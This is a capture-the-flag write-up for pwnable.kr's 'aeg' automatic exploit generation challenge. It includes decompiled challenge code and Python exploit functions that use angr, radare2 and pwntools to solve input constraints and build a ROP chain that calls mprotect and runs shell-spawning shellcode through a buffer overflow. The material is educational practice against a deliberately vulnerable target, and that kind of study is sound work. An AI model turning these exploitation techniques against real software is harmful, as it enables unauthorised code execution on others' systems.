pwnable.kr: aeg (550)
We are given an endpoint which we can connect to. The endpoint gives the following banner right after we connected:
---------------------------------------------------
- Welcome to AEG (Automatic Exploit Generation) -
---------------------------------------------------
I will send you a newly compiled binary (probably exploitable) in base64 format
after you get the binary, I will be waiting for your input as a plain text
when your input is given, I will execute the binary with your input as argv[1]
you have 10 seconds to build exploit payload
wait...
Oh hey wow, we need to create an automatic exploit generation program. Cool. After 10 seconds, the server then give us a base64 decoded gzip-ed ELF binary. The binary will be different everytime we connect it, thus we cannot just pwn it locally then point our script to throw the payload into the server.
Since it seems that they randomized things in a source code and then compiled it as ELF, I'm pretty sure the binary will have some persistent structure. Let's look at the binary from sample binary in IDA.
__int64 __fastcall main(int argc, char **argv, char **envp)
{
__int64 result; // rax@2
unsigned int v4; // eax@3
int v5; // eax@6
int v6; // eax@12
int v7; // eax@16
char v8; // [sp+10h] [bp-20h]@6
char v9; // [sp+11h] [bp-1Fh]@6
char v10; // [sp+12h] [bp-1Eh]@6
int i; // [sp+18h] [bp-18h]@8
int v12; // [sp+1Ch] [bp-14h]@11
int v13; // [sp+20h] [bp-10h]@10
int v14; // [sp+24h] [bp-Ch]@9
int v15; // [sp+28h] [bp-8h]@5
int v16; // [sp+2Ch] [bp-4h]@5
if ( argc == 2 )
{
v4 = sub_8034990(1LL, 2LL, 3LL, 4LL, 5LL, 6LL);
srand(v4);
half_arglen = strlen(argv[1]) >> 1;
if ( half_arglen <= 1000 )
{
v16 = 0;
v15 = 0;
while ( 2 * half_arglen > v16 )
{
v8 = argv[1][v16];
v9 = argv[1][v16 + 1];
v10 = 0;
v5 = v15++;
__isoc99_sscanf(&v8, "%02x", &input_buffer[(signed __int64)v5]);
v16 += 2;
}
for ( i = 0; i < half_arglen; ++i )
{
if ( (_BYTE)v14 == 218 && (_BYTE)v13 == -9 && 66 * (_BYTE)v14 + 73 * (_BYTE)v13 - (_BYTE)v12 == 81 )
{
v6 = v14++;
v13 = v6;
}
if ( (_BYTE)v14 == -7 && (_BYTE)v13 == 107 && 29 * (_BYTE)v13 + 31 * (_BYTE)v14 - (_BYTE)v12 == 92 )
{
v7 = v12++;
v14 = v7;
}
if ( i & 1 )
input_buffer[(signed __int64)i] ^= 0x36u;
else
input_buffer[(signed __int64)i] ^= 0x76u;
if ( (_BYTE)v14 == -24 && (_BYTE)v13 == -23 && 86 * (_BYTE)v13 + 51 * (_BYTE)v14 - (_BYTE)v12 == 74 )
v14 = v13 + v12;
if ( (_BYTE)v14 == -38 && (_BYTE)v13 == -9 && 66 * (_BYTE)v14 + 73 * (_BYTE)v13 - (_BYTE)v12 == 81 )
v13 = v14 - v12;
}
puts("payload encoded. let's go!");
go(input_buffer[0], byte_82373A1, byte_82373A2);
puts("end of program");
result = 0LL;
}
else
{
puts("payload length exceeds 1000byte");
result = 0LL;
}
}
else
{
puts("usage : ./aeg [hex encoded payload]");
result = 0LL;
}
return result;
}
It seems that our input will be encoded by xor with 0x36
/0x76
depending on
the index, and then it will call some functions with our encoded input.
char __fastcall go(char a1, char a2, char a3)
{
char result; // al@1
result = a3;
if ( a1 == -19 )
{
result = -22 - a2;
if ( a2 == -105 )
{
result = 22 * a1 + 3 * a2 - a3;
if ( result == 96 )
result = sub_8034876(byte_82373A3, byte_82373A4, byte_82373A5);
}
}
return result;
}
Basically there's 16 functions like these, each having 3 parameters. The function will proceed to call the next function if the 3 variables satisfy some kind of constraint. The last function called by the 16th function looked like this:
void *sub_803419C()
{
char dest; // [sp+0h] [bp-40h]@1
return memcpy(&dest, &after_input, half_arglen - 48);
}
It's just plain old buffer overflow vulnerability. So basically, what we need
to do is have our payload prefixed by some value that will satisfy the
constraints imposed by preceeding functions i.e. <prefix><payload>
.
There's also sub_8034990()
function which is weird if you see it at first
because just accept 1 through 6 as arguments and it does nothing after that.
__int64 sub_803496D()
{
return 0LL;
}
__int64 __fastcall sub_8034990(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)
{
return (unsigned int)sub_803496D();
}
But the disassembly version say something different:
/ (fcn) fcn.0803496d 35
| 0x0803496d 55 push rbp
| 0x0803496e 4889e5 mov rbp, rsp
| 0x08034971 48897db8 mov qword [rbp-0x48], rdi
| 0x08034975 488975b0 mov qword [rbp-0x50], rsi
| 0x08034979 488955a8 mov qword [rbp-0x58], rdx
| 0x0803497d 48894da0 mov qword [rbp-0x60], rcx
| 0x08034981 4c894598 mov qword [rbp-0x68], r8
| 0x08034985 4c894d90 mov qword [rbp-0x70], r9
| 0x08034989 b800000000 mov eax, 0
| 0x0803498e 5d pop rbp
\ 0x0803498f c3 ret
/ (fcn) fcn.08034990 78
| 0x08034990 55 push rbp
| 0x08034991 4889e5 mov rbp, rsp
| 0x08034994 4883ec70 sub rsp, 0x70 ; 'p'
| 0x08034998 48897db8 mov qword [rbp-0x48], rdi
| 0x0803499c 488975b0 mov qword [rbp-0x50], rsi
| 0x080349a0 488955a8 mov qword [rbp-0x58], rdx
| 0x080349a4 48894da0 mov qword [rbp-0x60], rcx
| 0x080349a8 4c894598 mov qword [rbp-0x68], r8
| 0x080349ac 4c894d90 mov qword [rbp-0x70], r9
| 0x080349b0 4c8b45a0 mov r8, qword [rbp-0x60]
| 0x080349b4 488b7d90 mov rdi, qword [rbp-0x70]
| 0x080349b8 488b4d98 mov rcx, qword [rbp-0x68]
| 0x080349bc 488b55b0 mov rdx, qword [rbp-0x50]
| 0x080349c0 488b75a8 mov rsi, qword [rbp-0x58]
| 0x080349c4 488b45b8 mov rax, qword [rbp-0x48]
| 0x080349c8 4d89c1 mov r9, r8
| 0x080349cb 4989f8 mov r8, rdi
| 0x080349ce 4889c7 mov rdi, rax
| 0x080349d1 e897ffffff call fcn.0803496d ;[1]
| 0x080349d6 8945fc mov dword [local_4h], eax
| 0x080349d9 8b45fc mov eax, dword [local_4h]
| 0x080349dc c9 leave
\ 0x080349dd c3 ret
The fun thing with this is function is, it can loads arguments to the registers. This will be useful as a gadget when we're crafting ROP as the binary is in 64-bit (in which the arguments are passed through registers, not stack).
But there's a catch, there's some parts of the binary that will be randomized.
- The xor value.
- The PADDING for xor line (those cryptic
if
s around the xor line). - The
dest
file size (which determines the padding needed before rop addresses). - The offset from rbp for loading arguments in the gadget.
Constraint Solver
Prior solving the challenge, I've heard of constraint solver called z3. I'm not really familiar with z3 but it's been used to solve problems where we need to search for the input, given the output and the operations to the input.
Unfortunately, extracting the constraint from the disassembly with regex might be too tedious. Instead, I look up for another solution which utilizes z3. The popular use of z3 in CTFs is usually using angr. After looking through the documentation for some time, I decided to try using angr to solve the constraints using angr. The result is pretty bad code and utilization of angr (as I've seen a better code with it later), but it works.
def solve_with_angr(bin_name):
p = angr.Project(bin_name, auto_load_libs=True)
cfg = p.analyses.CFGFast(regions=[(p.entry, p.loader.main_object.max_addr)], force_complete_scan=False)
# find main and start of function checks
init_state = p.factory.full_init_state()
sm = p.factory.simulation_manager(init_state)
sm.explore(find=p.entry+0x24)
sm.move(from_stash='found', to_stash='active')
main = sm.active[0].solver.eval(sm.active[0].regs.rdi)
main_func = cfg.functions.function(main)
chain_start = sorted(main_func.get_call_sites())[-2]
chain_addr = main_func.get_call_target(chain_start)
args = []
while len(args) < 0x30:
a = claripy.BVS('a', 8)
b = claripy.BVS('b', 8)
c = claripy.BVS('c', 8)
cur_state = p.factory.call_state(chain_addr, a, b, c)
sm = p.factory.simulation_manager(cur_state)
chain_func = cfg.functions.function(chain_addr)
chain_next = chain_func.get_call_sites()[0]
sm.explore(find=chain_next)
args.append(chr(sm.found[0].solver.eval(a)))
args.append(chr(sm.found[0].solver.eval(b)))
args.append(chr(sm.found[0].solver.eval(c)))
chain_addr = chain_func.get_call_target(chain_next)
last_state = p.factory.call_state(chain_addr)
sm = p.factory.simulation_manager(last_state)
sm.explore(find=chain_addr+0x20)
pad_size = sm.found[0].solver.eval(sm.found[0].regs.rbp-sm.found[0].regs.rdi)
return (pad_size, ''.join(args))
The function returns a tupple of the padding size needed at the exploitable function and the prefix needed to reach the function. Cool, huh?.
Reading the XOR values
I should've been able to extract the XOR values using angr too. Sadly, I didn't know how to use angr properly when I worked on this problem so I need to extract the XOR values directly from the disassembly. For that, I use r2pipe, which is a python binding to interact with radare2 directly. Neat!
def get_two_xor(bin_name):
r2 = r2pipe.open(bin_name)
r2.cmd('aaa')
main_disas = r2.cmd('pdf @ main')
pattern = re.compile('xor eax, (.*)')
return tuple([int(m.group(1), 16) & 0xff for m in re.finditer(pattern, main_disas)])
ROP crafting
Now, it's the headache part. The binary is dynamically linked so we can't
create ROP chain out of thin air with ROPgadget. At first, I tried to leak the
address of some functions using puts and then we can point to system
.
Unfortunately, it also run on top some other process, which will print stdout
ONLY if it execute cleanly. To make it worse, there's no relocation for
exit()
so we can't call it.
At this point, I'm already frustrated to the point I want to search for
solutions online, when I look at the list functions and there's one that I'm
don't know what it does. The function is called mprotect()
. After looking
quickly through the manual page, it seems that mprotect()
can change the
protection on some mapped memory region. Great, so we can use this to set our
buffer as executable and jump to it to get a shell. Let's try to use
mprotect()
.
We will construct ROP payload which will load some arguments for mprotect
(using the mentioned gadget), then jump to mprotect to change the protection,
and then jump to our shellcode. Because we don't know the stack address, we
can't change the protection for it. Instead, we'll use our input buffer right
after it was encoded. The input buffer is static in BSS section, so we know the
address. We can only change the input buffer, so we'll put the shellcode inside
the input buffer. Also, because we need to know the rbp
so the gadget can
load our arguments, we also need to use the input buffer to put the arguments
to mprotect()
. The rop payload will be in the input buffer because the load
parameter gadget changes the rsp
to our fake rbp
.
So, the ropchain payload in the buffer overflow will be <fake rbp><jump to
load parameter>
, which will allow the program to load arguments to registers.
After that, the ropchain payload is coming from the input buffer. The layout
of the ropchain payload in the input buffer will be
input|pad|shellcode|pad|arguments
. Some weird things happened if we use said
layout.
Apparently, mprotect()
use xsave [rsp+0x40]
instruction that messes up our
payload. I don't really know what it does, but a quick look at Intel
reference
manual tell us that it:
Performs a full or partial save of processor state components to the XSAVE area located at the memory address specified by the destination operand.
It's weird because it shouldn't mess with our payload. The rsp
register will
point to some weird memory location outside of the buffer, but when we step
right into the instruction, our payload become scattered. The instruction seems
to work at page-level, but we can't separate the shellcode page and buffer page
because our input is limited to 1000 bytes (usual page is 4K in size).
I'm frustrated again at this point and I just shuffle around the payload and I
came up with the input|pad|arguments|pad|shellcode
layout.
AND. IT. SUDDENLY. WORKS.
I don't know what really happened here, but it works. Running the script pointed to the game endpoint gives us a shell that we can use to get the flag. Here's the final ROP script:
def craft_rop(bin_name):
r2 = r2pipe.open(bin_name)
r2.cmd('e asm.varsub = false')
r2.cmd('aaa')
main_disas = r2.cmd('pdf@main')
helper_func = disas_regex('call (fcn\..*)', main_disas)
helper_disas = r2.cmd('pdf@{}'.format(helper_func))
param_loader = disas_regex_addr('.*(0x[0-9a-f]+).*mov .*, qword .*', helper_disas)
buffer_address = disas_regex_addr('lea rdx, \[rax \+ (0x[0-9a-f]+)\]', main_disas)
overflow_size, prefix_to_vuln = solve_with_angr(bin_name)
# payload layout
rbp_off = 0x100
rbp_addr = buffer_address + rbp_off
sc_off = 0x200
sc_addr = buffer_address + sc_off
sc = asm(shellcraft.sh())
# setup parameter address
# puzzle args, point rbp to rbp_addr which serve to store mprotect argument
rop = ''
rop += prefix_to_vuln
rop += cyclic(overflow_size)
rop += pack(buffer_address+rbp_off) + pack(param_loader)
# at rbp layout
# r8, rdi, rcx, rdx, rsi, rax
# r9 (= r8), r8 (= rdi), rdi (= rax)
# pad to rbp offset
rop += cyclic(rbp_off-len(rop))
rdi_off = rbp_off - disas_regex_addr('mov rax, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
rsi_off = rbp_off - disas_regex_addr('mov rsi, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
rdx_off = rbp_off - disas_regex_addr('mov rdx, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
rdi_arg = pack( (buffer_address + sc_off) & 0xfffffffffffff000 )
rsi_arg = pack(0x1000)
rdx_arg = pack(0x7)
rop = rop[:rdi_off] + rdi_arg + rop[rdi_off+len(rdi_arg):]
rop = rop[:rsi_off] + rsi_arg + rop[rsi_off+len(rsi_arg):]
rop = rop[:rdx_off] + rdx_arg + rop[rdx_off+len(rdx_arg):]
# construct ropchain to mprotect then to shellcode
elf = ELF(bin_name)
r = ROP(elf)
r.raw(rbp_addr)
r.raw(elf.symbols['mprotect'])
r.raw(sc_addr)
rop += r.chain()
# at sc layout
# pad to sc offset, then add shellcode
rop += cyclic(sc_off-len(rop))
rop += sc
return rop
I guess I'll study what xsave mem
next. But hey, at least I get the flag ;).
Note: I can't give the full solver script as it's against pwnable.kr rule